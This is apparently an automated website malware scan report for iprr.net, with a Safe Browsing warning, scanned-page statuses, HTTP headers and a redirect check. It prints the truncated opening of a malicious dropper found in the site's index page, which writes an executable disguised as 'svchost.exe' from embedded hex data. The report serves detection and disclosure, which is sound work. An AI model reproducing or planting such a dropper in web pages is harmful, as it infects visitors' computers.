Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=iprr.net
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://iprr.net/ | HTTP/1.1 200 OK Date: Thu, 17 Jul 2014 23:47:12 GMT Accept-Ranges: bytes ETag: "84fb475a6197cf1:1ec3" Server: Microsoft-IIS/6.0 Content-Length: 131002 Content-Location: http://iprr.net/index.htm Content-Type: text/html Last-Modified: Fri, 04 Jul 2014 08:24:19 GMT X-Powered-By: ASP.NET | clean |
http://iprr.net/index.htm | 200 OK Content-Length: 131002 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!--
DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B80000000000000040000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 ...[3620 bytes skipped]... Antivirus reports:
| ||
http://wpa.b.qq.com/cgi/wpa.php?key=XzgwMDAzODA2MF8yNTc1MF84MDAwMzgwNjBf | 200 OK Content-Length: 11358 Content-Type: text/javascript | suspicious |
Page code contains blacklisted domain: www.iprr.net ...[3411 bytes skipped]... "gdtChat","link"];w(p,function(){q[this]=function(y){return function(){var z=arguments,A=u+y;var B=r("7818","21","1");v.one("api.define."+A,function(){B.addPoint("3").send();q[y].apply(q,z)});x(A)}}(this)})})})(window.BizQQWPA); BizQQWPA.set("srcPath", "/crm/wpa/release/3.3.3/"); BizQQWPA.setVersion("3.3.20140708").load({"wty":"1","kfuin":"800038060","nameAccount":"800038060","type":"1","sv":"4","title":"","aty":"0","a":"0","ws":"www.iprr.net","btn1":"\u8425\u9500QQ\u4ea4\u8c08","btn2":"","fsty":"0","fposX":"0","fposY":"0","csty":"1","tx":"1","wd":"","wd2":"","curl":"","wid":"","di":""}); | ||
http://wpa.b.qq.com/cgi/wpa.php?key=XzgwMDAzODA2MF8yNTc0OV84MDAwMzgwNjBf | 200 OK Content-Length: 11493 Content-Type: text/javascript | suspicious |
Page code contains blacklisted domain: www.iprr.net ...[3301 bytes skipped]... ction(){q[this]=function(y){return function(){var z=arguments,A=u+y;var B=r("7818","21","1");v.one("api.define."+A,function(){B.addPoint("3").send();q[y].apply(q,z)});x(A)}}(this)})})})(window.BizQQWPA); BizQQWPA.set("srcPath", "/crm/wpa/release/3.3.3/"); BizQQWPA.setVersion("3.3.20140708").load({"wty":"1","kfuin":"800038060","nameAccount":"800038060","type":"12","sv":"4","title":"\u4f01\u4e1a\u540d\u79f0","aty":"0","a":"0","ws":"www.iprr.net","btn1":"\u8425\u9500QQ\u4ea4\u8c08","btn2":"\u4e0b\u6b21\u518d\u8bf4","fsty":"0","fposX":"2","fposY":"1","csty":"1","tx":"1","wd":"\u70b9\u51fb\u5373\u53ef\u53d1\u8d77\u4f1a\u8bdd","wd2":"ip\u6d41\u91cf\u63d0\u5347\u54a8\u8be2","curl":"","wid":"","di":""}); | ||
http://s95.cnzz.com/stat.php?id=1110398&web_id=1110398 | 200 OK Content-Length: 9321 Content-Type: application/javascript | clean |
http://shuatongji.iprr.net/stat.asp?id=22520 | 200 OK Content-Length: 650 Content-Type: text/html | clean |
http://shuatongji.iprr.net/test404page.js | 404 Not Found Content-Length: 83 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: iprr.net
Result:
HTTP/1.1 200 OK
Date: Thu, 17 Jul 2014 23:47:12 GMT
Accept-Ranges: bytes
ETag: "84fb475a6197cf1:1ec3"
Server: Microsoft-IIS/6.0
Content-Length: 131002
Content-Location: http://iprr.net/index.htm
Content-Type: text/html
Last-Modified: Fri, 04 Jul 2014 08:24:19 GMT
X-Powered-By: ASP.NET
...131002 bytes of data.
GET / HTTP/1.1
Host: iprr.net
Result:
HTTP/1.1 200 OK
Date: Thu, 17 Jul 2014 23:47:12 GMT
Accept-Ranges: bytes
ETag: "84fb475a6197cf1:1ec3"
Server: Microsoft-IIS/6.0
Content-Length: 131002
Content-Location: http://iprr.net/index.htm
Content-Type: text/html
Last-Modified: Fri, 04 Jul 2014 08:24:19 GMT
X-Powered-By: ASP.NET
...131002 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: iprr.net
Referer: http://www.google.com/search?q=iprr.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: iprr.net
Referer: http://www.google.com/search?q=iprr.net
Result:
The result is similar to the first query. There are no suspicious redirects found.